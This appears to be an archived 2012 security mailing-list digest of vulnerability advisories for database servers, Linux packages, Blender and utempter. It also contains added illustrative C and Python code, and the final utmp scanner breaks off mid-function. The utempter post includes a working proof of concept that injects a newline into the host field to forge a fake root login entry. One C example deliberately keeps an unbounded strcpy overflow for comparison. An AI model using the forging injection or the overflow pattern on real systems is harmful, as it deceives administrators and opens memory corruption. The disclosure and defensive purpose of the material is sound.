[DCA-2011-0013] - IBM Informix Dynamic Server 11.50 SET COLLATION Stack OverFlow

2012-10-09 Thread Crash
IBM Informix Dynamic Server 11.50 SET COLLATION Stack OverFlow

[DCA-2011-0013]

[Discussion]
- DcLabs Security Research Group advises about the following vulnerability(ies):

[Software/Hardware]
- IBM Informix

[Vendor Product Description]
IBM Informix is a family of relational database management system
(RDBMS) developed by IBM.
It is positioned as IBM's flagship data server for online transaction
processing (OLTP) as well as integrated solutions. IBM acquired the
Informix technology in 2001.[1]
[1] Source: http://en.wikipedia.org/wiki/IBM_Informix

[Advisory Timeline]
Sent to vendor [10/21/2011]
Automatic Vendor Reply
Sent to vendor [09/06/2012]
Vendor reply [11/06/2012]
Sent to Bugtraq after IBM disclosure without DcLabs credits [10/04/2012]

[Bug Summary]
The specific flaw exists within the oninit process bound to TCP port
9088 when processing the arguments to the COLLATION option in a SQL
query. User-supplied data is copied into a stack-based buffer without
proper bounds checking resulting in an overflow.

The vulnerability may result in arbitrary code execution in the security
context of the database server process.
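
As an added illustration of the flaw class in the bug summary (not Informix code and not part of the DcLabs advisory): a hypothetical handler for a SET COLLATION statement that copies the option argument into a fixed stack buffer unchecked, beside a hardened form that bounds and validates the name before anything is copied. The buffer size, the statement syntax and the permitted character set are assumptions made for the example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical fixed-size stack buffer for a collation name.  The real
 * Informix buffer size is not given in the advisory; 32 is a made-up value
 * chosen so that the length check below is easy to exercise. */
#define COLLATION_MAX 32

struct session {
    char collation[COLLATION_MAX];   /* current collation for the session */
};

/* Vulnerable pattern (the flaw class the advisory describes): the option
 * argument is copied into a fixed stack buffer with no check that it fits,
 * so an argument of COLLATION_MAX bytes or more overruns the stack frame.
 * Shown for comparison only; main() calls it with a short, benign name. */
void set_collation_unchecked(struct session *s, const char *name)
{
    char tmp[COLLATION_MAX];
    strcpy(tmp, name);                       /* unbounded copy */
    memcpy(s->collation, tmp, sizeof tmp);
}

/* Hardened form: the name is validated before anything is copied, and a
 * name that does not fit is rejected rather than silently truncated. */
int set_collation_checked(struct session *s, const char *name)
{
    size_t n = 0;

    /* bounded length scan: stop as soon as the name is too long */
    while (n < COLLATION_MAX && name[n] != '\0')
        n++;
    if (n == 0 || n == COLLATION_MAX)
        return -1;                           /* empty or too long */

    /* accept only characters that occur in locale/collation names */
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!isalnum(c) && c != '_' && c != '.' && c != '-' && c != '@')
            return -1;
    }
    memcpy(s->collation, name, n + 1);       /* n + 1 <= COLLATION_MAX */
    return 0;
}

/* Parse a statement of the (assumed) form  SET COLLATION '<name>'  and apply
 * it with the checked handler.  Returns 0 on success, -1 when the statement
 * is malformed or the name is unterminated, too long or contains bad bytes.
 * Nothing is written to the session until the whole name has been accepted. */
int handle_set_collation(struct session *s, const char *stmt)
{
    static const char prefix[] = "SET COLLATION '";
    char name[COLLATION_MAX];
    size_t n = 0;
    const char *p = stmt;

    if (strncmp(p, prefix, sizeof prefix - 1) != 0)
        return -1;
    p += sizeof prefix - 1;

    /* copy up to the closing quote; refuse anything that would not fit */
    while (*p != '\'') {
        if (*p == '\0' || n >= COLLATION_MAX - 1)
            return -1;                       /* unterminated or too long */
        name[n++] = *p++;
    }
    name[n] = '\0';
    return set_collation_checked(s, name);
}

int main(void)
{
    struct session s = { "" };
    char stmt[COLLATION_MAX + 64];

    /* a normal name is accepted by both handlers alike */
    printf("checked:   %d\n", handle_set_collation(&s, "SET COLLATION 'en_US.819'"));
    set_collation_unchecked(&s, "en_US.819");
    printf("collation: %s\n", s.collation);

    /* a name too long for the buffer is refused by the checked path */
    snprintf(stmt, sizeof stmt, "SET COLLATION '%0*d'", COLLATION_MAX + 8, 0);
    printf("overlong:  %d\n", handle_set_collation(&s, stmt));
    return 0;
}
```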

[Impact]
Medium

[Affected Version]
11.70
11.50
Previous Versions may also be vulnerable

[OS Platforms tested]
Windows XP SP3,
Windows 2003 R2
RedHat Enterprise 6,
Centos 5.3

[Evidences]
http://www.youtube.com/watch?v=3tjjHi6XC7I - Informix 10.70
http://www.youtube.com/watch?v=eVm4bUio_Pc - Informix 11.70

--
Ewerson Guimaraes (Crash)
Pentester/Researcher
DcLabs Security Team
www.dclabs.com.br


Team SHATTER Security Advisory: XML file disclosure vulnerability via GET_WRAP_CFG_C and GET_WRAP_CFG_C2

2012-10-09 Thread Shatter

AppSecInc Team SHATTER Security Advisory

XML file disclosure vulnerability via GET_WRAP_CFG_C and GET_WRAP_CFG_C2
system stored procedures.

Risk Level:
Medium

Affected versions:
IBM DB2 LUW 9.1, 9.5, 9.7, 10.1

Remote exploitable:
No

Credits:
This vulnerability was discovered and researched by Martin Rakhmanov of
Application Security Inc.

Details:
Two system stored procedures that PUBLIC can execute allow reading files
with the .xml extension on the server.
To exploit this vulnerability, the XML file must be readable by the DB2
fenced user.

Impact:
Authenticated database users can read xml files accessible to the DB2
fenced process.

Vendor Status:
Vendor was contacted and a patch was released.

Workaround:
Revoke EXECUTE privilege on GET_WRAP_CFG_C and GET_WRAP_CFG_C2 system
stored procedures from PUBLIC.

Fix:
IBM DB2 LUW 9.1: apply Fix Pack 12.
IBM DB2 LUW 9.5: apply Fix Pack 10.
IBM DB2 LUW 9.7: no fix yet.
IBM DB2 LUW 10.1: apply Fix Pack 1.

CVE:
CVE-2012-2196

Links:
https://www.teamshatter.com/?p=3912
https://www-304.ibm.com/support/docview.wss?uid=swg21607618

Timeline:
Vendor Notification - 05/27/2012
Vendor Response - 05/29/2012
Fix - 08/14/2012
Public Disclosure - 10/04/2012


--
Copyright (c) 2012 Application Security, Inc.
http://www.appsecinc.com

About Application Security, Inc. 

AppSecInc is a pioneer and leading provider of database security
solutions for the enterprise. By providing strategic and scalable
software-only solutions - AppDetectivePro for auditors and IT
advisors, and DbProtect for the enterprise - AppSecInc supports the
database security lifecycle for some of the most complex and demanding
environments in the world across more than 1,300 active commercial and
government customers.

Leveraging the world's most comprehensive database security
knowledgebase from the company's renowned team of threat researchers,
TeamSHATTER, AppSecInc products help customers achieve unprecedented
levels of data security from nefarious or accidental activities, while
reducing overall risk and helping to ensure continuous regulatory and
industry compliance.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information.
Use  of the information constitutes acceptance for use in an AS IS
condition. There are no warranties with regard to this information.
Neither the author nor the publisher accepts any liability for any
direct, indirect, or consequential loss or damage arising from use of,
or  reliance on, this information.


Team SHATTER Security Advisory: Multiple SQL Injection in Oracle Enterprise Manager (SQL Tuning Sets components)

2012-10-09 Thread Shatter

AppSecInc Team SHATTER Security Advisory

Multiple SQL Injection in Oracle Enterprise Manager (SQL Tuning Sets
components).

Risk Level:
High

Affected versions:
Oracle Enterprise Manager Database Control 11.1.0.7, 11.2.0.3 (and
previous patchsets)

Remote exploitable:
Yes

Credits:
This vulnerability was discovered and researched by Esteban Martinez
Fayo of Application Security Inc.

Details:
SQL injection works by modifying the parameters passed to an application
so as to change the SQL statements that the application sends to the
database; it can be used to insert additional SQL statements to be
executed.
There are multiple SQL injection vulnerabilities in components of SQL
Tuning Sets that can be abused to execute SQL statements with elevated
privileges. They can be exploited by convincing an Oracle Enterprise
Manager user to click on a malicious link or visit a web site with
malicious content (a cross-site request forgery attack).

Impact:
An attacker that convinces an Oracle Enterprise Manager user to click or
open a malicious link can impersonate the user and execute SQL statements.

Vendor Status:
Vendor was contacted and a patch was released.

Workaround:
There is no workaround for this vulnerability.

Fix:
Apply Oracle Critical Patch Update July 2012 available at Oracle Support.

CVE:
CVE-2012-1737

Links:
https://www.teamshatter.com/?p=3919
http://www.oracle.com/technetwork/topics/security/cpujul2012-392727.html

Timeline:
Vendor Notification - 5/30/2011
Vendor Response - 6/10/2011
Fix - 7/17/2012
Public Disclosure - 10/04/2012




Team SHATTER Security Advisory: Elevated roles through DBCC

2012-10-09 Thread Shatter

AppSecInc Team SHATTER Security Advisory

Elevated roles through DBCC

Risk Level:
High

Affected versions:
Sybase ASE 15.0, 15.5, 15.7

Remote exploitable:
No

Credits:
This vulnerability was discovered and researched by Martin Rakhmanov of
Application Security Inc.

Details:
Authenticated users can elevate privileges to any role via SQL injection
in one of the DBCC commands.

Impact:
Authenticated users can elevate privileges to any role.

Vendor Status:
Vendor was contacted and a patch was released.

Workaround:
None.

Fix:
Sybase ASE 15.0: apply ESD#4.1.
Sybase ASE 15.5: apply ESD#5.1.
Sybase ASE 15.7: apply ESD#1.

Links:
https://www.teamshatter.com/?p=3903
http://www.sybase.com/detail?id=1098877

Timeline:
Vendor Notification - 11/03/2011
Vendor Response - 11/10/2011
Fix - 07/25/2012
Public Disclosure - 10/04/2012



Team SHATTER Security Advisory: Java Operating System command execution

2012-10-09 Thread Shatter

AppSecInc Team SHATTER Security Advisory

Java Operating System command execution.

Risk Level:
High

Affected versions:
Sybase ASE 15.0, 15.5 and 15.7

Remote exploitable:
Yes

Credits:
This vulnerability was discovered and researched by Esteban Martinez
Fayo of Application Security Inc.

Details:
It is possible to execute Operating System commands using the Java call
Runtime.getRuntime().exec().

Impact:
Any low privileged database user can execute Operating System commands
on the Sybase server host with the privilege of the Sybase server
process.  The attack requires that Java is installed and enabled on
Sybase ASE.

Vendor Status:
Vendor was contacted and a patch was released.

Workaround:
There is no workaround for this vulnerability.

Fix:
Apply the following ESD depending on the Sybase ASE version:
15.0.3: ESD#4.1
15.5: ESD#5.1
15.7: ESD#1 Refresh 1, ESD#1 Refresh 2

Links:
https://www.teamshatter.com/?p=3909
http://www.sybase.com/detail?id=1098877

Timeline:
Vendor Notification - 11/23/2011
Vendor Response - 12/01/2011
Fix - 7/25/2012
Public Disclosure - 10/04/2012




[ MDVSA-2012:151-1 ] ghostscript

2012-10-09 Thread security

 ___

 Mandriva Linux Security Advisory   MDVSA-2012:151-1
 http://www.mandriva.com/security/
 ___

 Package : ghostscript
 Date: October 5, 2012
 Affected: 2011.
 ___

 Problem Description:

 A security issue was identified and fixed in ghostscript:
 
 An integer overflow flaw, leading to a heap-based buffer overflow, was
 found in Ghostscript's International Color Consortium Format library
 (icclib). An attacker could create a specially-crafted PostScript or
 PDF file with embedded images that would cause Ghostscript to crash
 or, potentially, execute arbitrary code with the privileges of the
 user running Ghostscript (CVE-2012-4405).
 
 The updated packages have been patched to correct this issue.

 Update:

 Packages for Mandriva Linux 2011 are being provided.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4405
 ___

 Updated Packages:

 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com



[ MDVSA-2012:150-1 ] java-1.6.0-openjdk

2012-10-09 Thread security

 ___

 Mandriva Linux Security Advisory   MDVSA-2012:150-1
 http://www.mandriva.com/security/
 ___

 Package : java-1.6.0-openjdk
 Date: October 5, 2012
 Affected: 2011.
 ___

 Problem Description:

 Multiple security issues were identified and fixed in OpenJDK
 (icedtea6):
 
 Unspecified vulnerability in the Java Runtime Environment (JRE)
 component in Oracle Java SE 7 Update 6 and earlier, and 6 Update 34
 and earlier, has no impact and remote attack vectors involving AWT
 and a security-in-depth issue that is not directly exploitable but
 which can be used to aggravate security vulnerabilities that can be
 directly exploited. NOTE: this identifier was assigned by the Oracle
 CNA, but CVE is not intended to cover defense-in-depth issues that are
 only exposed by the presence of other vulnerabilities (CVE-2012-0547).
 
 Unspecified vulnerability in the Java Runtime Environment (JRE)
 component in Oracle Java SE 7 Update 6 and earlier allows remote
 attackers to affect confidentiality, integrity, and availability
 via unknown vectors related to Beans, a different vulnerability than
 CVE-2012-3136 (CVE-2012-1682).
 
 The updated packages provide icedtea6-1.11.4, which is not vulnerable
 to these issues.

 Update:

 Packages for Mandriva Linux 2011 are being provided.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0547
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1682
 
http://www.oracle.com/technetwork/topics/security/alert-cve-2012-4681-1835715.html
 ___

 Updated Packages:

 ___




[ MDVSA-2012:160 ] imagemagick

2012-10-09 Thread security

 ___

 Mandriva Linux Security Advisory MDVSA-2012:160
 http://www.mandriva.com/security/
 ___

 Package : imagemagick
 Date: October 5, 2012
 Affected: 2011., Enterprise Server 5.0
 ___

 Problem Description:

 A vulnerability has been found and corrected in imagemagick:
 
 The Magick_png_malloc function in coders/png.c in ImageMagick 6.7.8-6
 does not use the proper variable type for the allocation size, which
 might allow remote attackers to cause a denial of service (crash)
 via a crafted PNG file that triggers incorrect memory allocation
 (CVE-2012-3437).
 
 The updated packages have been patched to correct this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3437
 ___

 Updated Packages:

 ___




[SECURITY] [DSA 2555-1] libxslt security update

2012-10-09 Thread Moritz Muehlenhoff

------------------------------------------------------------------------
Debian Security Advisory DSA-2555-1                   secur...@debian.org
http://www.debian.org/security/                        Moritz Muehlenhoff
October 05, 2012                       http://www.debian.org/security/faq
------------------------------------------------------------------------

Package: libxslt
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2012-2870 CVE-2012-2871 CVE-2012-2893

Nicholas Gregoire and Cris Neckar discovered several memory handling
bugs in libxslt, which could lead to denial of service or the execution
of arbitrary code if a malformed document is processed.

For the stable distribution (squeeze), these problems have been fixed in
version 1.1.26-6+squeeze2.

For the unstable distribution (sid), these problems have been fixed in
version 1.1.26-14.

We recommend that you upgrade your libxslt packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



ESA-2012-035: RSA Adaptive Authentication (On-Premise) Information Disclosure Vulnerability

2012-10-09 Thread Security Alert




ESA-2012-035: RSA® Adaptive Authentication (On-Premise) Information Disclosure Vulnerability

EMC Identifier: ESA-2012-035 

CVE Identifier: CVE-2012-2286 

Severity Rating: CVSS v2 Base Score: 7.9 (AV:A/AC:M/Au:N/C:C/I:C/A:C)

Affected Products:

RSA Adaptive Authentication (On-Premise) 6.0.2.1


Summary:

RSA Adaptive Authentication (On-Premise) contains a vulnerability that can 
potentially lead to sensitive information disclosure.



Details:

RSA Adaptive Authentication (On-Premise) contains a vulnerability that could 
allow sensitive information disclosure when calling specific components within 
the application.


Recommendation:

RSA AAOP (On-Premise) 6.0.2.1 SP3 P3 contains changes that resolve this issue. 
See the Release Notes for the required configuration changes to enable the fix 
in your environment. 


Severity Rating:

For an explanation of Severity Ratings, refer to the Knowledge Base Article,
"Security Advisories Severity Rating" at
https://knowledge.rsasecurity.com/scolcms/knowledge.aspx?solution=a46604. RSA
recommends that all customers take into account both the base score and any
relevant temporal and environmental scores which may affect the potential
severity associated with a particular security vulnerability.



Obtaining Downloads:

To obtain the latest RSA product downloads, log on to RSA SecurCare Online at 
https://knowledge.rsasecurity.com and click Products in the top navigation 
menu. Select the specific product whose download you want to obtain. Scroll to 
the section for the product download that you want and click on the link.



Obtaining Documentation:

To obtain RSA documentation, log on to RSA SecurCare Online at 
https://knowledge.rsasecurity.com and click Products in the top navigation 
menu. Select the specific product whose documentation you want to obtain. 
Scroll to the section for the product version that you want and click the set 
link.



Obtaining More Information:

For more information about RSA Adaptive Authentication, visit the RSA web site 
at http://www.rsa.com/node.aspx?id=3018.



Getting Support and Service:

For customers with current maintenance contracts, contact your local RSA 
Customer Support center with any additional questions regarding this RSA 
SecurCare Note. For contact telephone numbers or e-mail addresses, log on to 
RSA SecurCare Online at https://knowledge.rsasecurity.com, click Help >
Contact, and then click the Contact Us - Phone tab or the Contact Us - Email
tab.



General Customer Support Information:

http://www.rsa.com/node.aspx?id=1264


RSA SecurCare Online:

https://knowledge.rsasecurity.com


EOPS Policy:

RSA has a defined End of Primary Support policy associated with all major 
versions. Please refer to the link below for additional details. 
http://www.rsa.com/node.aspx?id=2575 



SecurCare Online Security Advisories

RSA, The Security Division of EMC, distributes SCOL Security Advisories in 
order to bring to the attention of users of the affected RSA products important 
security information. RSA recommends that all users determine the applicability 
of this information to their individual situations and take appropriate action. 
The information set forth herein is provided as is without warranty of any 
kind. RSA disclaim all warranties, either express or implied, including the 
warranties of merchantability, fitness for a particular purpose, title and 
non-infringement. In no event shall RSA or its suppliers be liable for any 
damages whatsoever including direct, indirect, incidental, consequential, loss 
of business profits or special damages, even if RSA or its suppliers have been 
advised of the possibility of such damages. Some states do not allow the 
exclusion or limitation of liability for consequential or incidental damages so 
the foregoing limitation may not apply.


About RSA SecurCare Notes & Security Advisories Subscription

RSA SecurCare Notes & Security Advisories are targeted e-mail messages that RSA
sends you based on the RSA product family you currently use. If you'd like to
stop receiving RSA SecurCare Notes & Security Advisories, or if you'd like to
change which RSA product family Notes & Security Advisories you currently
receive, log on to RSA SecurCare Online at
https://knowledge.rsasecurity.com/scolcms/help.aspx?_v=view3. Following the
instructions on the page, remove the check mark next to the RSA product family
whose Notes & Security Advisories you no longer want to receive. Click the
Submit button to save your selection.



EMC Product Security Response Center

security_al...@emc.com

http://www.emc.com/contact-us/contact/product-security-response-center.html



Blender 2.63 Exploitable User Mode Write AV

2012-10-09 Thread beford
Description: User Mode Write AV
Short Description: WriteAV
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - User Mode Write AV starting at
blender!PyInit_aud+0x003a56cc (Hash=0x23420309.0x667c4642)

User mode write access violations that are not near NULL are exploitable.

POC Files
===
Attachments: 
http://projects.blender.org/tracker/index.php?func=detail&aid=32653&group_id=9&atid=498

Vendor Acknowledged
=
http://projects.blender.org/tracker/index.php?func=detail&aid=32653&group_id=9&atid=498

Vendor Response

We don't care.

They do not intend to fix this bug or any other security bug. It only
took about 30 minutes to find all of these with a small number of seed
files (around 10) using FOE2:

./EXPLOITABLE/0x23420309.0x667c4642/sf_0378e695403019ae75f46c47a4d71299-47-0x05841040-minimized.blend
./EXPLOITABLE/0x24432e67.0x684e3725/sf_fac171c436911fadb381eb2a9ef0760c-878-0x0ce41000-minimized.blend
./EXPLOITABLE/0x574b491d.0x574b4935/sf_6e55b1a0f2696a0bc4e80cbb468429f0-435-0x00846446-minimized.blend
./EXPLOITABLE/0x655e6416.0x467d0874/sf_c40aa52b109a96a511e9433d4ac56b51-255-0x4c425952-minimized.blend
./PROBABLY_EXPLOITABLE/0x23420309.0x0244045e/sf_9dab7310ddde4fbc4136fdca1fecc00a-978-0x0589-minimized.blend
./PROBABLY_EXPLOITABLE/0x23420309.0x0e4d1e23/sf_fac171c436911fadb381eb2a9ef0760c-15-0x0cd72000-minimized.blend
./PROBABLY_EXPLOITABLE/0x23420309.0x20456162/sf_2f3647f84b4baff07959929aa1c33a5c-394-0x05a3-minimized.blend
./PROBABLY_EXPLOITABLE/0x23420309.0x24367e2d/sf_9fdabc33e3fe46177504cbf7e566f65d-1225-0x05a52004-minimized.blend
./PROBABLY_EXPLOITABLE/0x23420309.0x243f7e2d/sf_60fd4e31e7c1fda4c51c40a348c6da4b-75-0x0c9b9000-minimized.blend
./PROBABLY_EXPLOITABLE/0x23420309.0x3c214a19/sf_2f3647f84b4baff07959929aa1c33a5c-424-0x-minimized.blend
./PROBABLY_EXPLOITABLE/0x23420309.0x66274642/sf_6e55b1a0f2696a0bc4e80cbb468429f0-560-0x05b6000c-minimized.blend
./PROBABLY_EXPLOITABLE/0x23420309.0x662b1d4e/sf_60fd4e31e7c1fda4c51c40a348c6da4b-1195-0x05a4-minimized.blend
./PROBABLY_EXPLOITABLE/0x23420309.0x74000f4c/sf_c40aa52b109a96a511e9433d4ac56b51-853-0x0cd4b000-minimized.blend
./PROBABLY_EXPLOITABLE/0x23420309.0x74080f4c/sf_2f3647f84b4baff07959929aa1c33a5c-394-0x05813000-minimized.blend
./PROBABLY_EXPLOITABLE/0x24432e67.0x032d7039/sf_bbdbbb1315eed73948d9812aa075ac89-309-0x0598-minimized.blend
./PROBABLY_EXPLOITABLE/0x24432e67.0x03777039/sf_60fd4e31e7c1fda4c51c40a348c6da4b-337-0x0ca87000-minimized.blend
./PROBABLY_EXPLOITABLE/0x24432e67.0x6776414c/sf_fac171c436911fadb381eb2a9ef0760c-195-0x0cc27004-minimized.blend
./PROBABLY_EXPLOITABLE/0x43317564.0x06317564/sf_60fd4e31e7c1fda4c51c40a348c6da4b-48-0x-minimized.blend
./PROBABLY_EXPLOITABLE/0x492b4007.0x62223b6d/sf_c40aa52b109a96a511e9433d4ac56b51-172-0x-minimized.blend
./PROBABLY_EXPLOITABLE/0x655e6416.0x6c0f6a7a/sf_0378e695403019ae75f46c47a4d71299-1218-0x0305-minimized.blend
./PROBABLY_EXPLOITABLE/0x6607464c.0x43096734/sf_fac171c436911fadb381eb2a9ef0760c-908-0x1e24fffc-minimized.blend
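
The list above is raw FOE2 output. Before such a list is reported (or dismissed), the usual triage step is to bucket it by the !exploitable major hash: the major hash is derived from the faulting call stack and the minor hash adds finer detail, so entries sharing a major hash are normally one bug reached from different seeds. The Python below is an added example, not code from the post or from the FOE/!exploitable projects. It parses a constructed subset of the paths quoted above (the layout `./<classification>/<major>.<minor>/sf_<seed md5>-<iteration>-<fault address>-minimized.blend` is inferred from those paths and is an assumption) and reports, per bucket, the crash count, the most severe classification seen and which seed files reached it.

```python
import re

# Constructed sample: a subset of the FOE2 result paths quoted in the post above.
SAMPLE_PATHS = """\
./EXPLOITABLE/0x23420309.0x667c4642/sf_0378e695403019ae75f46c47a4d71299-47-0x05841040-minimized.blend
./EXPLOITABLE/0x24432e67.0x684e3725/sf_fac171c436911fadb381eb2a9ef0760c-878-0x0ce41000-minimized.blend
./PROBABLY_EXPLOITABLE/0x23420309.0x0244045e/sf_9dab7310ddde4fbc4136fdca1fecc00a-978-0x0589-minimized.blend
./PROBABLY_EXPLOITABLE/0x23420309.0x0e4d1e23/sf_fac171c436911fadb381eb2a9ef0760c-15-0x0cd72000-minimized.blend
./PROBABLY_EXPLOITABLE/0x24432e67.0x032d7039/sf_bbdbbb1315eed73948d9812aa075ac89-309-0x0598-minimized.blend
./PROBABLY_EXPLOITABLE/0x6607464c.0x43096734/sf_fac171c436911fadb381eb2a9ef0760c-908-0x1e24fffc-minimized.blend
"""

# Path layout assumed from the quoted listing:
#   ./<classification>/<major hash>.<minor hash>/sf_<seed md5>-<iteration>-<fault address>-minimized.blend
# The fault address is kept verbatim because several entries in the post are truncated.
CRASH_PATH_RE = re.compile(
    r"^\./(?P<cls>[A-Z_]+)/(?P<major>0x[0-9a-f]+)\.(?P<minor>0x[0-9a-f]+)/"
    r"sf_(?P<seed>[0-9a-f]{32})-(?P<iteration>\d+)-(?P<addr>0x[0-9a-f]*)-minimized\.blend$"
)

# !exploitable classifications, most severe first.
SEVERITY = {"EXPLOITABLE": 0, "PROBABLY_EXPLOITABLE": 1, "UNKNOWN": 2, "PROBABLY_NOT_EXPLOITABLE": 3}


def parse_crash_path(path):
    """Return the fields encoded in one FOE result path, or None if it does not match."""
    m = CRASH_PATH_RE.match(path.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["iteration"] = int(rec["iteration"])
    return rec


def classification_counts(listing):
    """Count result paths per !exploitable classification."""
    counts = {}
    for line in listing.splitlines():
        rec = parse_crash_path(line)
        if rec:
            counts[rec["cls"]] = counts.get(rec["cls"], 0) + 1
    return counts


def bucket_by_major_hash(listing):
    """Group crashes by major hash: count, worst classification, seeds and distinct minor hashes."""
    buckets = {}
    for line in listing.splitlines():
        rec = parse_crash_path(line)
        if rec is None:
            continue
        b = buckets.setdefault(rec["major"], {"count": 0, "worst": None, "seeds": set(), "minors": set()})
        b["count"] += 1
        b["seeds"].add(rec["seed"])
        b["minors"].add(rec["minor"])
        if b["worst"] is None or SEVERITY.get(rec["cls"], 99) < SEVERITY.get(b["worst"], 99):
            b["worst"] = rec["cls"]
    return buckets


if __name__ == "__main__":
    print("by classification:", classification_counts(SAMPLE_PATHS))
    for major, b in sorted(bucket_by_major_hash(SAMPLE_PATHS).items(), key=lambda kv: -kv[1]["count"]):
        print(f"{major}: {b['count']} crash(es), worst={b['worst']}, "
              f"{len(b['minors'])} minor hash(es), seeds={sorted(s[:8] for s in b['seeds'])}")
```

On the six sample paths this yields three buckets instead of six crashes, with 0x23420309 already carrying an EXPLOITABLE entry; a maintainer can then be handed one minimized reproducer per major hash rather than the whole directory.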


[ MDVSA-2012:161 ] html2ps

2012-10-09 Thread security
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2012:161
 http://www.mandriva.com/security/
 ___

 Package : html2ps
 Date: October 6, 2012
 Affected: 2011.
 ___

 Problem Description:

 A vulnerability has been found and corrected in html2ps:
 
 Directory traversal vulnerability in html2ps before 1.0b7 allows
 remote attackers to read arbitrary files via directory traversal
 sequences in SSI directives (CVE-2009-5067).
 
 The updated packages have been upgraded to the 1.0b7 version which
 is not affected by this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-5067
 ___

 Updated Packages:

 Mandriva Linux 2011:
 a0ef74f6f963d98fc4305994bf810dbf  
2011/i586/html2ps-2.0-2.b7.0.1-mdv2011.0.noarch.rpm
 fc582a56f07cdce61aabec91ed261870  
2011/i586/xhtml2ps-2.0-2.b7.0.1-mdv2011.0.noarch.rpm 
 93aa1dc24c23c205360f5513816353d3  2011/SRPMS/html2ps-2.0-2.b7.0.1.src.rpm

 Mandriva Linux 2011/X86_64:
 528aa56f1547da9a385cf1ef01445e73  
2011/x86_64/html2ps-2.0-2.b7.0.1-mdv2011.0.noarch.rpm
 7c167fb40bc2655231eafe734c738a4d  
2011/x86_64/xhtml2ps-2.0-2.b7.0.1-mdv2011.0.noarch.rpm 
 93aa1dc24c23c205360f5513816353d3  2011/SRPMS/html2ps-2.0-2.b7.0.1.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)

iD8DBQFQb90WmqjQ0CJFipgRAqZxAKDoo7b1mmAMd/jwwKGCbYK0G8wkhgCdF8R/
E/ExUIDSWh+VeqW4s3in0+0=
=4pmC
-----END PGP SIGNATURE-----



utempter allows fake host setting

2012-10-09 Thread paul . szabo
Quoting from 
http://bugs.debian.org/689562

  Utempter does not (cannot?) verify the setting of host, so it can easily
  be faked. This may affect any software that depends on utmp correctness.
  
  Demo of the issue:
  
  psz@bari:~$ cat silly.c
  #include <sys/types.h>
  #include <sys/stat.h>
  #include <fcntl.h>
  #include <unistd.h>
  #include <stdio.h>
  #include <stdlib.h>   /* system() */
  int main()
  {
    int i;
    /* open a fresh pty master; the utempter helper identifies the pty via fd 0 */
    i = open("/dev/ptmx", O_RDWR);
    printf("open ptmx returned %d\n", i);
    dup2(i, 0);
    /* dup2(i, 1); */
    printf("doing utempter add\n");
    /* the host argument carries a newline followed by a forged who(1) line */
    system("/usr/lib/utempter/utempter add 'xyz)\nr00t pts/0    Jan  1 01:02 (xyz.com'");
    printf("checking who\n");
    system("who | grep xyz");
    printf("doing utempter del\n");
    system("/usr/lib/utempter/utempter del");
    printf("checking who\n");
    system("who | grep xyz");
    printf("DONE\n");
    return 0;
  }
  psz@bari:~$ cc silly.c; a.out
  open ptmx returned 3
  doing utempter add
  checking who
  psz      pts/29       Oct  4 11:48 (xyz)
  r00t pts/0    Jan  1 01:02 (xyz.com)
  doing utempter del
  checking who
  DONE
  psz@bari:~$ 
  
  Please see also:
  http://bugs.debian.org/329156
  http://bugs.debian.org/330907

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of SydneyAustralia
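
The demo above works because ut_host is a free-form string that utempter stores as given and who(1) prints verbatim inside parentheses, so a newline in the field renders as a second, forged login line. One defensive check is to scan the utmp file for host fields containing characters no hostname or address can contain. The Python below is an added example, not part of Paul's post or of utempter. It assumes the glibc struct utmp layout of x86-64 Linux (384-byte records; other ABIs differ) and runs against constructed sample records, one of which carries the same forged host string as the demo.

```python
import struct
import sys

# Assumption: glibc struct utmp as laid out on x86-64 Linux, 384 bytes per record
# (ut_session and ut_tv are 32-bit there; e.g. aarch64 uses 64-bit fields and 400 bytes).
UTMP_STRUCT = struct.Struct("<hxxi32s4s32s256shhiii4i20x")
USER_PROCESS = 7  # ut_type of a normal login session


def _cstr(raw):
    """Decode a NUL-padded fixed-size field."""
    return raw.split(b"\0", 1)[0].decode("utf-8", "replace")


def parse_utmp(data):
    """Split a utmp image into records; a trailing partial record is ignored."""
    records = []
    for off in range(0, len(data) - UTMP_STRUCT.size + 1, UTMP_STRUCT.size):
        f = UTMP_STRUCT.unpack_from(data, off)
        records.append({
            "ut_type": f[0], "ut_pid": f[1], "ut_line": _cstr(f[2]),
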